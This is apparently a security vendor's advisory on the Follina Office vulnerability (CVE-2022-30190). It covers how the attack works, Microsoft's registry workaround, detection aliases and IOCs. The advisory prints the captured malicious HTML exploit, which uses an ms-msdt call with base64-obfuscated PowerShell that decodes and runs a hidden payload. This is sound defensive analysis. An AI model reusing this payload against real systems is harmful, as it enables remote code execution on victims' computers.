Caution! Microsoft Office Zero-day Vulnerability Follina (CVE-2022-30190)

A new vulnerability named Follina (CVE-2022-30190) has been revealed. According to Microsoft, it is a remote code execution vulnerability that occurs when the URL protocol is used to call MSDT in calling applications such as Microsoft Word. With the privileges of the calling application, attackers can run arbitrary codes, install additional programs, and view, change or delete data.

1. Vulnerability Malware Example

The vulnerability occurs when a Word file downloads and runs an HTML file responsible for the vulnerability through the URL connection written in the external tag, a method that has been previously known (as the URL is currently invalid, additional operations do not work). As soon as the Word file with the vulnerability is opened, it accesses the URL and calls the MSDT of the downloaded HTML to execute malicious codes.

Figure 1. – External tag within the Word file attempting to connect to the URL

Figure 2. – Details of document.xml.rels

The details of above RDF8421.html file shares the same code shown below and has a code that executes ms-msdt. By running ms-msdt, various attacks can be made possible according to the attacker’s intention.

<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-- omitted --

//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>

</body>
</html>

2. Response to Vulnerability

Microsoft posted the following response for the vulnerability.

  • Disabling the MSDT URL protocol
    1. Run command prompt (cmd.exe) as administrator
    2. Execute “reg export HKEY_CLASSES_ROOT\ms-msdt filename” to back up the registry key
    3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt\f”

3. AhnLab Products Response Status

AhnLab can detect the vulnerable file and its behaviors with the following aliases:

  • (File alias) Exploit/HTML.CVE-2022-30190.S1841
  • (Behavior alias) Behavior/MDP.Event.M4313

[IOC]

hxxps://www.xmlformats[.]com/office/word/2022/wordprocessingDrawing/RDF842l.html
52945af1def85b171870b31fa4782e52
d1fe26b84043ac11fa5ddb90906e6d56

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Reference 1. https://www.huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
Reference 2. https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

5 1 vote
Article Rating
guest
1 Comment
Inline Feedbacks
View all comments
trackback

[…] Caution! Microsoft Office Zero-day Vulnerability Follina (CVE-2022-30190) […]